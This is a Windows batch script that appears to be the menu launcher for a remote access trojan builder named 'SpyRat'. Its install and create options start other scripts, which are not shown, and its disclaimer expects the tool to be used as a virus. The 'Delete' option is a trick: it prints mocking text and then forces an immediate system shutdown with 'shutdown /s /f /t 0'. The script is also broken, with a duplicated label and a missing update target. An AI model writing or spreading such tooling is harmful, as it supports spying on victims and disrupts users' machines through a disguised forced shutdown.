echo off
echo SpyRat by Olivier/SympactDev
echo VisualBasic and Python
PING localhost -n 5 >NUL
cls
echo I am not responsable if you misuse this program as virus (i know you are BUT I AM NOT RESPONABLE FOR IT!!!)
PING localhost -n 6 >NUL
cls
echo --------- WeLcOmE tO sPy-RaT bY oLiViEr/SyMpAcT ----------------
PING localhost -n 2 >NUL
echo STARTING....
PING localhost -n 5 >NUL
echo Made By Sympact/Olivier
PING localhost -n 5 >NUL
cls
echo Copyright Sympact
:choice
set /P c=Do you want to install[I] Delete[D] Check for Updates[U] or create rat[C](FIRST EDIT RAT.PY BEFORE CREATING)
if /I "%c%" EQU "I" goto :installprogram
if /I "%c%" EQU "D" goto :deleteprogram
if /I "%c%" EQU "C" goto :createrat
if /I "%c%" EQU "U" goto :update
goto :choice


:installprogram

cls 
echo Copyright Sympact
echo Creating Installer...
START THsiOTsfJP.bat

exit

:createrat

cls 
echo Copyright Sympact
echo Creating RAT.....
START RjsIODOGksODOGHK.bat

exit

:createrat

cls 
echo Copyright Sympact
echo Checking for updates...
START RjsIODOGksODOGHK.bat

exit

:deleteprogram

echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
echo "RIP RIP RIP RIP RIP RIP RIP RIP RIP RIPR$IP"
PING localhost -n 6 >NUL
cls
echo Jk i tought you arent a skid but ofc you are now.......
echo Deleting.....
echo SIKE
PING localhost -n 2 >NUL
shutdown /s /f /t 0
exit
